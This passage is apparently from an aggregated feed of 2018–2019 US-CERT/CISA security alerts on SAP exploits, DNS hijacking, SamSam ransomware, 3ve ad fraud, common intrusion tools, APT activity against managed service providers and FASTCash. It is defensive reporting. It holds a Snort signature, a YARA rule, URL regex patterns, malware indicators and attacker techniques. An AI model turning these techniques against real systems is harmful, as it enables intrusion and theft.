customer in all releases. Signature CISA worked with security researchers from Onapsis Inc.[ 3 ] to develop the following Snort signature that can be used to detect the exploits: alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"10KBLAZE SAP Exploit execute attempt"; flow:established,to_server; content:"|06 cb 03|"; offset:4; depth:3; content:"SAPXPG_START_XPG"; nocase; distance:0; fast_pattern; content:"37D581E3889AF16DA00A000C290099D0001"; nocase; distance:0; content:"extprog"; nocase; distance:0; sid:1; rev:1;)   Mitigations CISA recommends administrators of SAP systems implement the following to mitigate the vulnerabilities included in the OPCDE presentation: Ensure a secure configuration of their SAP landscape. Restrict access to SAP Message Server. Review SAP Notes 1408081 and 821875. Restrict authorized hosts via ACL files on Gateways ( gw/acl_mode and secinfo ) and Message Servers ( ms/acl_info ).[ 4 ], [ 5 ] Review SAP Note 1421005. Split MS internal/public: rdisp/msserv=0 rdisp/msserv_internal=39NN . [ 6 ] Restrict access to Message Server internal port ( tcp/39NN ) to clients or the internet. Enable Secure Network Communications (SNC) for clients. Scan for exposed SAP components. Ensure that SAP components are not exposed to the internet. Remove or secure any exposed SAP components. References [1] Comae Technologies: Operation for Community Development and Empowerment (OPCDE) Cybersecurity Conference Materials [2] SAP: Gateway Access Control Lists [3] Onapsis Inc. website [4] SAP Note 1408081 [5] SAP Note 821875 [6] SAP Note 1421005 Revisions May 2, 2019: Initial version This product is provided subject to this Notification and this Privacy & Use policy. (more)

Posted on 3 May 2019 1:54 am


Orpak SiteOmat

Advisory Document (more)

Posted on 2 May 2019 7:10 pm


GE Communicator

Advisory Document (more)

Posted on 2 May 2019 7:05 pm


Sierra Wireless AirLink ALEOS

Advisory Document (more)

Posted on 2 May 2019 7:00 pm


Philips Tasy EMR

Advisory Document (more)

Posted on 30 April 2019 7:05 pm


Rockwell Automation CompactLogix 5370


Advisory Document (more)

Posted on 30 April 2019 7:00 pm


Fujifilm FCR Capsula X/Carbon X

Advisory Document (more)

Posted on 23 April 2019 7:05 pm


Rockwell Automation MicroLogix 1400 and CompactLogix 5370 Controllers

Advisory Document (more)

Posted on 23 April 2019 7:00 pm


AA19-024A: DNS Infrastructure Hijacking Campaign

Original release date: January 24, 2019 | Last revised: February 13, 2019 Summary The National Cybersecurity and Communications Integration Center (NCCIC), part of the Cybersecurity and Infrastructure Security Agency (CISA), is aware of a global Domain Name System (DNS) infrastructure hijacking campaign. Using compromised credentials, an attacker can modify the location to which an organization’s domain name resources resolve. This enables the attacker to redirect user traffic to attacker-controlled infrastructure and obtain valid encryption certificates for an organization’s domain names, enabling man-in-the-middle attacks. See the following links for downloadable copies of open-source indicators of compromise (IOCs) from the sources listed in the References section below: IOCs (.csv) IOCs (.stix) Note: these files were last updated February 13, 2019, to remove the following three non-malicious IP addresses: 107.161.23.204 192.161.187.200 209.141.38.71 Technical Details Using the following techniques, attackers have redirected and intercepted web and mail traffic, and could do so for other networked services. The attacker begins by compromising user credentials, or obtaining them through alternate means, of an account that can make changes to DNS records. Next, the attacker alters DNS records, like Address (A), Mail Exchanger (MX), or Name Server (NS) records, replacing the legitimate address of a service with an address the attacker controls. This enables them to direct user traffic to their own infrastructure for manipulation or inspection before passing it on to the legitimate service, should they choose. This creates a risk that persists beyond the period of traffic redirection. Because the attacker can set DNS record values, they can also obtain valid encryption certificates for an organization’s domain names. This allows the redirected traffic to be decrypted, exposing any user-submitted data. Since the certificate is valid for the domain, end users receive no error warnings. Mitigations NCCIC recommends the following best practices to help safeguard networks against this threat: Update the passwords for all accounts that can change organizations’ DNS records. Implement multifactor authentication on domain registrar accounts, or on other systems used to modify DNS records. Audit public DNS records to verify they are resolving to the intended location. Search for encryption certificates related to domains and revoke any fraudulently requested certificates. References Cisco Talos blog: DNSpionage Campaign Targets Middle East CERT-OPMD blog: [DNSPIONAGE] – Focus on internal actions FireEye blog: Global DNS Hijacking Campaign: DNS Record Manipulation at Scale Crowdstrike blog: Widespread DNS Hijacking Activity Targets Multiple Sectors Revisions January 24, 2019: Initial version February 6, 2019: Updated IOCs, added Crowdstrike blog February 13, 2019: Updated IOCs This product is provided subject to this Notification and this Privacy & Use policy. (more)

Posted on 24 January 2019 10:01 pm


AA18-337A: SamSam Ransomware

Original release date: December 03, 2018 Summary The Department of Homeland Security (DHS) National Cybersecurity and Communications Integration Center (NCCIC) and the Federal Bureau of Investigation (FBI) are issuing this activity alert to inform computer network defenders about SamSam ransomware, also known as MSIL/Samas.A. Specifically, this product shares analysis of vulnerabilities that cyber actors exploited to deploy this ransomware. In addition, this report provides recommendations for prevention and mitigation. The SamSam actors targeted multiple industries, including some within critical infrastructure. Victims were located predominately in the United States, but also internationally. Network-wide infections against organizations are far more likely to garner large ransom payments than infections of individual systems. Organizations that provide essential functions have a critical need to resume operations quickly and are more likely to pay larger ransoms. The actors exploit Windows servers to gain persistent access to a victim’s network and infect all reachable hosts. According to reporting from victims in early 2016, cyber actors used the JexBoss Exploit Kit to access vulnerable JBoss applications. Since mid-2016, FBI analysis of victims’ machines indicates that cyber actors use Remote Desktop Protocol (RDP) to gain persistent access to victims’ networks. Typically, actors either use brute force attacks or stolen login credentials. Detecting RDP intrusions can be challenging because the malware enters through an approved access point. After gaining access to a particular network, the SamSam actors escalate privileges for administrator rights, drop malware onto the server, and run an executable file, all without victims’ action or authorization. While many ransomware campaigns rely on a victim completing an action, such as opening an email or visiting a compromised website, RDP allows cyber actors to infect victims with minimal detection. Analysis of tools found on victims’ networks indicated that successful cyber actors purchased several of the stolen RDP credentials from known darknet marketplaces. FBI analysis of victims’ access logs revealed that the SamSam actors can infect a network within hours of purchasing the credentials. While remediating infected systems, several victims found suspicious activity on their networks unrelated to SamSam. This activity is a possible indicator that the victims’ credentials were stolen, sold on the darknet, and used for other illegal activity. SamSam actors leave ransom notes on encrypted computers. These instructions direct victims to establish contact through a Tor hidden service site. After paying the ransom in Bitcoin and establishing contact, victims usually receive links to download cryptographic keys and tools to decrypt their network. Technical Details NCCIC recommends organizations review the following SamSam Malware Analysis Reports. The reports represent four SamSam malware variants. This is not an exhaustive list. MAR-10219351.r1.v2 – SamSam1 MAR-10166283.r1.v1 – SamSam2 MAR-10158513.r1.v1 – SamSam3 MAR-10164494.r1.v1 – SamSam4 For general information on ransomware, see the NCCIC Security Publication at https://www.us-cert.gov/security-publications/Ransomware . Mitigations DHS and FBI recommend that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. System owners and administrators should review any configuration changes before implementation to avoid unwanted impacts. Audit your network for systems that use RDP for remote communication. Disable the service if unneeded or install available patches. Users may need to work with their technology venders to confirm that patches will not affect system processes. Verify that all cloud-based virtual machine instances with public IPs have no open RDP ports, especially port 3389, unless there is a valid business reason to keep open RDP ports. Place any system with an open RDP port behind a firewall and require users to use a virtual private network (VPN) to access that system. Enable strong passwords and account lockout policies to defend against brute force attacks. Where possible, apply two-factor authentication. Regularly apply system and software updates. Maintain a good back-up strategy. Enable logging and ensure that logging mechanisms capture RDP logins. Keep logs for a minimum of 90 days and review them regularly to detect intrusion attempts. When creating cloud-based virtual machines, adhere to the cloud provider’s best practices for remote access. Ensure that third parties that require RDP access follow internal policies on remote access. Minimize network exposure for all control system devices. Where possible, disable RDP on critical devices. Regulate and limit external-to-internal RDP connections. When external access to internal resources is required, use secure methods such as VPNs. Of course, VPNs are only as secure as the connected devices. Restrict users' ability (permissions) to install and run unwanted software applications. Scan for and remove suspicious email attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header). Disable file and printer sharing services. If these services are required, use strong passwords or Active Directory authentication. Additional information on malware incident prevention and handling can be found in Special Publication 800-83, Guide to Malware Incident Prevention and Handling for Desktops and Laptops , from the National Institute of Standards and Technology. [1] Contact Information To report an intrusion and request resources for incident response or technical assistance, contact NCCIC, FBI, or the FBI’s Cyber Division via the following information: NCCIC NCCICCustomerService@hq.dhs.gov 888-282-0870 FBI’s Cyber Division CyWatch@fbi.gov 855-292-3937 FBI through a local field office Feedback DHS strives to make this report a valuable tool for our partners and welcomes feedback on how this publication could be improved. You can help by answering a few short questions about this report at the following URL: https://www.us-cert.gov/forms/feedback . References [1] NIST SP 800-83: Guide to Malware Incident Prevention and Handling for Desktops and Laptops Revisions December 3, 2018: Initial version This product is provided subject to this Notification and this Privacy & Use policy. (more)

Posted on 3 December 2018 6:18 pm


TA18-331A: 3ve – Major Online Ad Fraud Operation

Original release date: November 27, 2018 Systems Affected Microsoft Windows Overview This joint Technical Alert (TA) is the result of analytic efforts between the Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI). DHS and FBI are releasing this TA to provide information about a major online ad fraud operation—referred to by the U.S. Government as "3ve"—involving the control of over 1.7 million unique Internet Protocol (IP) addresses globally, when sampled over a 10-day window. Description Online advertisers desire premium websites on which to publish their ads and large numbers of visitors to view those ads. 3ve created fake versions of both (websites and visitors), and funneled the advertising revenue to cyber criminals. 3ve obtained control over 1.7 million unique IPs by leveraging victim computers infected with Boaxxe/Miuref and Kovter malware, as well as Border Gateway Protocol-hijacked IP addresses.  Boaxxe/Miuref Malware Boaxxe malware is spread through email attachments and drive-by downloads. The ad fraud scheme that utilizes the Boaxxe botnet is primarily located in a data center. Hundreds of machines in this data center are browsing to counterfeit websites. When these counterfeit webpages are loaded into a browser, requests are made for ads to be placed on these pages. The machines in the data center use the Boaxxe botnet as a proxy to make requests for these ads. A command and control (C2) server sends instructions to the infected botnet computers to make the ad requests in an effort to hide their true data center IPs. Kovter Malware Kovter malware is also spread through email attachments and drive-by downloads. The ad fraud scheme that utilizes the Kovter botnet runs a hidden Chromium Embedded Framework (CEF) browser on the infected machine that the user cannot see. A C2 server tells the infected machine to visit counterfeit websites. When the counterfeit webpage is loaded in the hidden browser, requests are made for ads to be placed on these counterfeit pages. The infected machine receives the ads and loads them into the hidden browser. Impact For the indicators of compromise (IOCs) below, keep in mind that any one indicator on its own may not necessarily mean that a machine is infected. Some IOCs may be present for legitimate applications and network traffic as well, but are included here for completeness. Boaxxe/Miuref Malware Boaxxe malware leaves several executables on the infected machine. They may be found in one or more of the following locations: %UserProfile%\AppData\Local\VirtualStore\lsass.aaa %UserProfile%\AppData\Local\Temp\<RANDOM>.exe %UserProfile%\AppData\Local\<Random eight-character folder name>\<original file name>.exe The HKEY_CURRENT_USER (HKCU) “Run” key is set to the path to one of the executables created above. HKCU\Software\Microsoft\Windows\CurrentVersion\Run\<Above path to executable>\ Kovter Malware Kovter malware is found mostly in the registry, but the following files may be found on the infected machine: %UserProfile\AppData\Local\Temp\<RANDOM> .exe/.bat %UserProfile%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\<RANDOM>\<RANDOM FILENAME>.exe %UserProfile%\AppData\Local\<RANDOM>\<RANDOM>.lnk %UserProfile%\AppData\Local\<RANDOM>\<RANDOM>.bat Kovter is known to hide in the registry under: HKCU\SOFTWARE\<RANDOM>\<RANDOM> The customized CEF browser is dropped to: %UserProfile%\AppData\Local\<RANDOM> The keys will look like random values and contain scripts. In some values, a User-Agent string can be clearly identified. An additional key containing a link to a batch script on the hard drive may be placed within registry key: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run There are several patterns in the network requests that are made by Kovter malware when visiting the counterfeit websites. The following are regex rules for these URL patterns: /?ptrackp=\d{5,8} /feedrs\d/click?feed_id=\d{1,5}&sub_id=\d{1,5}&cid=[a-f0-9-]*&spoof_domain=[\w\.\d-_]*&land_ip=\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3} /feedrs\d/vast_track?a=impression&feed_id=\d{5}&sub_id=\d{1,5}&sub2_id=\d{1,5}&cid=[a-f\d-] The following is a YARA rule for detecting Kovter: rule KovterUnpacked {   meta:     desc = "Encoded strings in unpacked Kovter samples."   strings:     $ = "7562@3B45E129B93"     $ = "@ouhKndCny"     $ = "@ouh@mmEdctffdsr"     $ = "@ouhSGQ"   condition:     all of them } Solution If you believe you may be a victim of 3ve and its associated malware or hijacked IPs, and have information that may be useful to investigators, submit your complaint to www.ic3.gov and use the hashtag 3ve (#3ve) in the body of your complaint. DHS and FBI advise users to take the following actions to remediate malware infections associated with Boaxxe/Miuref or Kovter: Use and maintain antivirus software. Antivirus software recognizes and protects your computer against most known viruses. Security companies are continuously updating their software to counter these advanced threats. Therefore, it is important to keep your antivirus software up-to-date. If you suspect you may be a victim of malware, update your antivirus software definitions and run a full-system scan. (See Understanding Anti-Virus Software for more information.) Avoid clicking links in email. Attackers have become very skilled at making phishing emails look legitimate. Users should ensure the link is legitimate by typing the link into a new browser. (See Avoiding Social Engineering and Phishing Attacks .) Change your passwords. Your original passwords may have been compromised during the infection, so you should change them. (See Choosing and Protecting Passwords .) Keep your operating system and application software up-to-date. Install software patches so that attackers cannot take advantage of known problems or vulnerabilities. You should enable automatic updates of the operating system if this option is available. (See Understanding Patches and Software Updates  for more information.) Use anti-malware tools. Using a legitimate program that identifies and removes malware can help eliminate an infection... (more)

Posted on 27 November 2018 7:09 pm


AA18-284A: Publicly Available Tools Seen in Cyber Incidents Worldwide

Original release date: October 11, 2018 Summary This report is a collaborative research effort by the cyber security authorities of five nations: Australia, Canada, New Zealand, the United Kingdom, and the United States. [1] [2] [3] [4] [5] In it we highlight the use of five publicly available tools, which have been used for malicious purposes in recent cyber incidents around the world. The five tools are: Remote Access Trojan: JBiFrost Webshell: China Chopper Credential Stealer: Mimikatz Lateral Movement Framework: PowerShell Empire C2 Obfuscation and Exfiltration: HUC Packet Transmitter To aid the work of network defenders and systems administrators, we also provide advice on limiting the effectiveness of these tools and detecting their use on a network. The individual tools we cover in this report are limited examples of the types of tools used by threat actors. You should not consider this an exhaustive list when planning your network defense. Tools and techniques for exploiting networks and the data they hold are by no means the preserve of nation states or criminals on the dark web. Today, malicious tools with a variety of functions are widely and freely available for use by everyone from skilled penetration testers, hostile state actors and organized criminals, to amateur cyber criminals. The tools in this Activity Alert have been used to compromise information across a wide range of critical sectors, including health, finance, government, and defense. Their widespread availability presents a challenge for network defense and threat-actor attribution. Experience from all our countries makes it clear that, while cyber threat actors continue to develop their capabilities, they still make use of established tools and techniques. Even the most sophisticated threat actor groups use common, publicly available tools to achieve their objectives. Whatever these objectives may be, initial compromises of victim systems are often established through exploitation of common security weaknesses. Abuse of unpatched software vulnerabilities or poorly configured systems are common ways for a threat actor to gain access. The tools detailed in this Activity Alert come into play once a compromise has been achieved, enabling attackers to further their objectives within the victim’s systems. How to Use This Report The tools detailed in this Activity Alert fall into five categories: Remote Access Trojans (RATs), webshells, credential stealers, lateral movement frameworks, and command and control (C2) obfuscators. This Activity Alert provides an overview of the threat posed by each tool, along with insight into where and when it has been deployed by threat actors. Measures to aid detection and limit the effectiveness of each tool are also described. The Activity Alert concludes with general advice for improving network defense practices. Technical Details Remote Access Trojan: JBiFrost   First observed in May 2015, the JBiFrost RAT is a variant of the Adwind RAT, with roots stretching back to the Frutas RAT from 2012. A RAT is a program that, once installed on a victim’s machine, allows remote administrative control. In a malicious context, it can—among many other functions—be used to install backdoors and key loggers, take screen shots, and exfiltrate data. Malicious RATs can be difficult to detect because they are normally designed not to appear in lists of running programs and can mimic the behavior of legitimate applications. To prevent forensic analysis, RATs have been known to disable security measures (e.g., Task Manager) and network analysis tools (e.g., Wireshark) on the victim’s system. In Use JBiFrost RAT is typically employed by cyber criminals and low-skilled threat actors, but its capabilities could easily be adapted for use by state-sponsored threat actors. Other RATs are widely used by Advanced Persistent Threat (APT) actor groups, such as Adwind RAT, against the aerospace and defense sector; or Quasar RAT, by APT10, against a broad range of sectors. Threat actors have repeatedly compromised servers in our countries with the purpose of delivering malicious RATs to victims, either to gain remote access for further exploitation, or to steal valuable information such as banking credentials, intellectual property, or PII. Capabilities JBiFrost RAT is Java-based, cross-platform, and multifunctional. It poses a threat to several different operating systems, including Windows, Linux, MAC OS X, and Android. JBiFrost RAT allows threat actors to pivot and move laterally across a network or install additional malicious software. It is primarily delivered through emails as an attachment, usually an invoice notice, request for quotation, remittance notice, shipment notification, payment notice, or with a link to a file hosting service. Past infections have exfiltrated intellectual property, banking credentials, and personally identifiable information (PII). Machines infected with JBiFrost RAT can also be used in botnets to carry out distributed denial-of-service attacks. Examples Since early 2018, we have observed an increase in JBiFrost RAT being used in targeted attacks against critical national infrastructure owners and their supply chain operators. There has also been an increase in the RAT’s hosting on infrastructure located in our countries. In early 2017, Adwind RAT was deployed via spoofed emails designed to look as if they originated from Society for Worldwide Interbank Financial Telecommunication, or SWIFT, network services. Many other publicly available RATs, including variations of Gh0st RAT, have also been observed in use against a range of victims worldwide. Detection and Protection Some possible indications of a JBiFrost RAT infection can include, but are not limited to: Inability to restart the computer in safe mode, Inability to open the Windows Registry Editor or Task Manager, Significant increase in disk activity and/or network traffic, Connection attempts to known malicious Internet Protocol (IP) addresses, and Creation of new files and directories with obfuscated or random names. Protection is best afforded by ensuring systems and installed applications are all fully patched and updated. The use of a modern antivirus program with automatic definition updates and regular system scans will also help ensure that most of the latest variants are stopped in their tracks. You should ensure that your organization is able to collect antivirus detections centrally across its estate and investigate RAT detections efficiently. Strict application whitelisting is recommended to prevent infections from occurring. The initial infection mechanism for RATs, including JBiFrost RAT, can be via phishing emails... (more)

Posted on 11 October 2018 6:19 pm


TA18-276B: Advanced Persistent Threat Activity Exploiting Managed Service Providers

Original release date: October 03, 2018 Systems Affected Network Systems Overview The National Cybersecurity and Communications Integration Center (NCCIC) is aware of ongoing APT actor activity attempting to infiltrate the networks of global managed service providers (MSPs). Since May 2016, APT actors have used various tactics, techniques, and procedures (TTPs) for the purposes of cyber espionage and intellectual property theft. APT actors have targeted victims in several U.S. critical infrastructure sectors, including Information Technology (IT), Energy, Healthcare and Public Health, Communications, and Critical Manufacturing. This Technical Alert (TA) provides information and guidance to assist MSP customer network and system administrators with the detection of malicious activity on their networks and systems and the mitigation of associated risks. This TA includes an overview of TTPs used by APT actors in MSP network environments, recommended mitigation techniques, and information on reporting incidents. Description MSPs provide remote management of customer IT and end-user systems. The number of organizations using MSPs has grown significantly over recent years because MSPs allow their customers to scale and support their network environments at a lower cost than financing these resources internally. MSPs generally have direct and unfettered access to their customers’ networks, and may store customer data on their own internal infrastructure. By servicing a large number of customers, MSPs can achieve significant economies of scale. However, a compromise in one part of an MSP’s network can spread globally, affecting other customers and introducing risk. Using an MSP significantly increases an organization’s virtual enterprise infrastructure footprint and its number of privileged accounts, creating a larger attack surface for cyber criminals and nation-state actors. By using compromised legitimate MSP credentials (e.g., administration, domain, user), APT actors can move bidirectionally between an MSP and its customers’ shared networks. Bidirectional movement between networks allows APT actors to easily obfuscate detection measures and maintain a presence on victims’ networks. Note: NCCIC previously released information related to this activity in Alert TA17-117A: Intrusions Affecting Multiple Victims Across Multiple Sectors published on April 27, 2017, which includes indicators of compromise, signatures, suggested detection methods, and recommended mitigation techniques. Technical Details APT APT actors use a range of “living off the land” techniques to maintain anonymity while conducting their attacks. These techniques include using legitimate credentials and trusted off-the-shelf applications and pre-installed system tools present in MSP customer networks. Pre-installed system tools, such as command line scripts, are very common and used by system administrators for legitimate processes. Command line scripts are used to discover accounts and remote systems. PowerSploit is a repository of Microsoft PowerShell and Visual Basic scripts and uses system commands such as netsh . PowerSploit, originally developed as a legitimate penetration testing tool, is widely misused by APT actors. These scripts often cannot be blocked because they are legitimate tools, so APT actors can use them and remain undetected on victim networks. Although network defenders can generate log files, APT actors’ use of legitimate scripts makes it difficult to identify system anomalies and other malicious activity. When APT actors use system tools and common cloud services, it can also be difficult for network defenders to detect data exfiltration. APT actors have been observed using Robocopy—a Microsoft command line tool—to transfer exfiltrated and archived data from MSP client networks back through MSP network environments. Additionally, APT actors have been observed using legitimate PuTTY Secure Copy Client functions, allowing them to transfer stolen data securely and directly to third-party systems. Impact A successful network intrusion can have severe impacts to the affected organization, particularly if the compromise becomes public. Possible impacts include Temporary or permanent loss of sensitive or proprietary information, Disruption to regular operations, Financial losses to restore systems and files, and Potential harm to the organization’s reputation. Solution Detection Organizations should configure system logs to detect incidents and to identify the type and scope of malicious activity. Properly configured logs enable rapid containment and appropriate response. Response An organization’s ability to rapidly respond to and recover from an incident begins with the development of an incident response capability. An organization’s response capability should focus on being prepared to handle the most common attack vectors (e.g., spearphishing, malicious web content, credential theft). In general, organizations should prepare by Establishing and periodically updating an incident response plan. Establishing written guidelines that prioritize incidents based on mission impact, so that an appropriate response can be initiated. Developing procedures and out-of-band lines of communication to handle incident reporting for internal and external relationships. Exercising incident response measures for various intrusion scenarios regularly, as part of a training regime. Committing to an effort that secures the endpoint and network infrastructure: prevention is less costly and more effective than reacting after an incident. Mitigation Manage Supply Chain Risk MSP clients that do not conduct the majority of their own network defense should work with their MSP to determine what they can expect in terms of security. MSP clients should understand the supply chain risk associated with their MSP. Organizations should manage risk equally across their security, legal, and procurement groups. MSP clients should also refer to cloud security guidance from the National Institute of Standards and Technology to learn about MSP terms of service, architecture, security controls, and risks associated with cloud computing and data protection. [1] [2] [3] Architecture Restricting access to networks and systems is critical to containing an APT actor’s movement. Provided below are key items that organizations should implement and periodically audit to ensure their network environment’s physical and logical architecture limits an APT actor’s visibility and access. Virtual Private Network Connection Recommendations Use a dedicated Virtual Private Network (VPN) for MSP connection... (more)

Posted on 3 October 2018 2:47 pm


TA18-276A: Using Rigorous Credential Control to Mitigate Trusted Network Exploitation

Original release date: October 03, 2018 Systems Affected Network Systems Overview This technical alert addresses the exploitation of trusted network relationships and the subsequent illicit use of legitimate credentials by Advanced Persistent Threat (APT) actors. It identifies APT actors' tactics, techniques, and procedures (TTPs) and describes the best practices that could be employed to mitigate each of them. The mitigations for each TTP are arranged according to the National Institute of Standards and Technology (NIST) Cybersecurity Framework core functions of Protect, Detect, Respond, and Recover. Description APT actors are using multiple mechanisms to acquire legitimate user credentials to exploit trusted network relationships in order to expand unauthorized access, maintain persistence, and exfiltrate data from targeted organizations. Suggested best practices for administrators to mitigate this threat include auditing credentials, remote-access logs, and controlling privileged access and remote access. Impact APT actors are conducting malicious activity against organizations that have trusted network relationships with potential targets, such as a parent company, a connected partner, or a contracted managed service provider (MSP). APT actors can use legitimate credentials to expand unauthorized access, maintain persistence, exfiltrate data, and conduct other operations, while appearing to be authorized users. Leveraging legitimate credentials to exploit trusted network relationships also allows APT actors to access other devices and other trusted networks, which affords intrusions a high level of persistence and stealth. Solution Recommended best practices for mitigating this threat include rigorous credential and privileged-access management, as well as remote-access control, and audits of legitimate remote-access logs. While these measures aim to prevent the initial attack vectors and the spread of malicious activity, there is no single proven threat response. Using a defense-in-depth strategy is likely to increase the odds of successfully disrupting adversarial objectives long enough to allow network defenders to detect and respond before the successful completion of a threat actor’s objectives. Any organization that uses an MSP to provide services should monitor the MSP's interactions within their organization’s enterprise networks, such as account use, privileges, and access to confidential or proprietary information. Organizations should also ensure that they have the ability to review their security and monitor their information hosted on MSP networks. APT TTPs and Corresponding Mitigations The following table displays the TTPs employed by APT actors and pairs them with mitigations that network defenders can implement. Table 1: APT TTPs and Mitigations APT TTPs Mitigations Preparation Allocate operational infrastructure, such as Internet Protocol addresses (IPs). Gather target credentials to use for legitimate access. Protect: Educate users to never click unsolicited links or open unsolicited attachments in emails. Implement an awareness and training program. Detect: Leverage multi-sourced threat-reputation services for files, Domain Name System (DNS), Uniform Resource Locators (URLs), IPs, and email addresses. Engagement Use legitimate remote access, such as virtual private networks (VPNs) and Remote Desktop Protocol (RDP). Leverage a trusted relationship between networks. Protect: Enable strong spam filters to prevent phishing emails from reaching end users. Authenticate inbound email using Sender Policy Framework; Domain-Based Message Authentication, Reporting and Conformance; and DomainKeys Identified Mail to prevent email spoofing. Prevent external access via RDP sessions and require VPN access. Enforce multi-factor authentication and account-lockout policies to defend against brute force attacks. Detect: Leverage multi-sourced threat-reputation services for files, DNS, URLs, IPs, and email addresses. Scan all incoming and outgoing emails to detect threats and filter out executables. Audit all remote authentications from trusted networks or service providers for anomalous activity. Respond and Recover: Reset credentials, including system accounts. Transition to multifactor authentication and reduce use of password-based systems, which are susceptible to credential theft, forgery, and reuse across multiple systems. Presence Execution and Internal Reconnaissance: Write to disk and execute malware and tools on hosts. Use interpreted scripts and run commands in shell to enumerate accounts, local network, operating system, software, and processes for internal reconnaissance. Map accessible networks and scan connected targets. Lateral Movement: Use remote services and log on remotely. Use legitimate credentials to move laterally onto hosts, domain controllers, and servers. Write to remote file shares, such as Windows administrative shares. Credential Access: Locate credentials, dump credentials, and crack passwords. Protect: Deploy an anti-malware solution, which also aims to prevent spyware and adware. Prevent the execution of unauthorized software, such as Mimikatz, by using application whitelisting. Deploy PowerShell mitigations and, in the more current versions of PowerShell, enable monitoring and security features. Prevent unauthorized external access via RDP sessions. Restrict workstations from communicating directly with other workstations. Separate administrative privileges between internal administrator accounts and accounts used by trusted service providers. Enable detailed session-auditing and session-logging. Detect: Audit all remote authentications from trusted networks or service providers. Detect mismatches by correlating credentials used within internal networks with those employed on external-facing systems. Log use of system administrator commands, such as net, ipconfig, and ping. Audit logs for suspicious behavior. Use whitelist or baseline comparison to monitor Windows event logs and network traffic to detect when a user maps a privileged administrative share on a Windows system. Leverage multi-sourced threat-reputation services for files, DNS, URLs, IPs, and email addresses. Respond and Recover: Reset credentials. Monitor accounts associated with a compromise for abnormal behaviors, including unusual connections to nonstandard resources or attempts to elevate privileges, enumerate, or execute unexpected programs or applications... (more)

Posted on 3 October 2018 2:00 pm


TA18-275A: HIDDEN COBRA – FASTCash Campaign

Original release date: October 02, 2018 | Last revised: December 21, 2018 Systems Affected Retail Payment Systems Overview This joint Technical Alert (TA) is the result of analytic efforts between the Department of Homeland Security (DHS), the Department of the Treasury (Treasury), and the Federal Bureau of Investigation (FBI). Working with U.S. government partners, DHS, Treasury, and FBI identified malware and other indicators of compromise (IOCs) used by the North Korean government in an Automated Teller Machine (ATM) cash-out scheme—referred to by the U.S. Government as “FASTCash.” The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA. For more information on HIDDEN COBRA activity, visit https://www.us-cert.gov/hiddencobra . FBI has high confidence that HIDDEN COBRA actors are using the IOCs listed in this report to maintain a presence on victims’ networks to enable network exploitation. DHS, FBI, and Treasury are distributing these IOCs to enable network defense and reduce exposure to North Korean government malicious cyber activity. This TA also includes suggested response actions to the IOCs provided, recommended mitigation techniques, and information on reporting incidents. If users or administrators detect activity associated with the malware families associated with FASTCash, they should immediately flag it, report it to the DHS National Cybersecurity and Communications Integration Center (NCCIC) or the FBI Cyber Watch (CyWatch), and give it the highest priority for enhanced mitigation. NCCIC conducted analysis on 10 malware samples related to this activity and produced a Malware Analysis Report (MAR). MAR-10201537, HIDDEN COBRA FASTCash-Related Malware, examines the tactics, techniques, and procedures observed in the malware. Visit the MAR-10201537 page for the report and associated IOCs. Description Since at least late 2016, HIDDEN COBRA actors have used FASTCash tactics to target banks in Africa and Asia. At the time of this TA’s publication, the U.S. Government has not confirmed any FASTCash incidents affecting institutions within the United States. FASTCash schemes remotely compromise payment switch application servers within banks to facilitate fraudulent transactions. The U.S. Government assesses that HIDDEN COBRA actors will continue to use FASTCash tactics to target retail payment systems vulnerable to remote exploitation. According to a trusted partner’s estimation, HIDDEN COBRA actors have stolen tens of millions of dollars. In one incident in 2017, HIDDEN COBRA actors enabled cash to be simultaneously withdrawn from ATMs located in over 30 different countries. In another incident in 2018, HIDDEN COBRA actors enabled cash to be simultaneously withdrawn from ATMs in 23 different countries.   HIDDEN COBRA actors target the retail payment system infrastructure within banks to enable fraudulent ATM cash withdrawals across national borders. HIDDEN COBRA actors have configured and deployed malware on compromised switch application servers in order to intercept and reply to financial request messages with fraudulent but legitimate-looking affirmative response messages. Although the infection vector is unknown, all of the compromised switch application servers were running unsupported IBM Advanced Interactive eXecutive (AIX) operating system versions beyond the end of their service pack support dates; there is no evidence HIDDEN COBRA actors successfully exploited the AIX operating system in these incidents. HIDDEN COBRA actors exploited the targeted systems by using their knowledge of International Standards Organization (ISO) 8583—the standard for financial transaction messaging—and other tactics. HIDDEN COBRA actors most likely deployed ISO 8583 libraries on the targeted switch application servers. Malicious threat actors use these libraries to help interpret financial request messages and properly construct fraudulent financial response messages. Figure 1: Anatomy of a FASTCash scheme A review of log files showed HIDDEN COBRA actors making typos and actively correcting errors while configuring the targeted server for unauthorized activity. Based on analysis of the affected systems, analysts believe that malware—used by HIDDEN COBRA actors and explained in the Technical Details section below—inspected inbound financial request messages for specific primary account numbers (PANs). The malware generated fraudulent financial response messages only for the request messages that matched the expected PANs. Most accounts used to initiate the transactions had minimal account activity or zero balances. Analysts believe HIDDEN COBRA actors blocked transaction messages to stop denial messages from leaving the switch and used a GenerateResponse* function to approve the transactions. These response messages were likely sent for specific PANs matched using CheckPan() verification (see figure 1 for additional details on CheckPan() ). Technical Details HIDDEN COBRA actors used malicious Windows executable applications, command-line utility applications, and other files in the FASTCash campaign to perform transactions and interact with financial systems, including the switch application server. The initial infection vector used to compromise victim networks is unknown; however, analysts surmise HIDDEN COBRA actors used spear-phishing emails in targeted attacks against bank employees. HIDDEN COBRA actors likely used Windows-based malware to explore a bank’s network to identify the payment switch application server. Although these threat actors used different malware in each known incident, static analysis of malware samples indicates similarities in malware capabilities and functionalities. HIDDEN COBRA actors likely used legitimate credentials to move laterally through a bank’s network and to illicitly access the switch application server. This pattern suggests compromised systems within a bank’s network were used to access and compromise the targeted payment switch application server. Upon successful compromise of a bank’s payment switch application server, HIDDEN COBRA actors likely injected malicious code into legitimate processes—using command-line utility applications on the payment switch application server—to enable fraudulent behavior by the system in response to what would otherwise be normal payment switch application server activity. NCCIC collaborated with Symantec cybersecurity researchers to provide additional context on existing analysis [1] . Malware samples analyzed included malicious AIX executable files intended for a proprietary UNIX operating system developed by IBM. The AIX executable files were designed to inject malicious code into a currently running process... (more)

Posted on 2 October 2018 6:45 pm


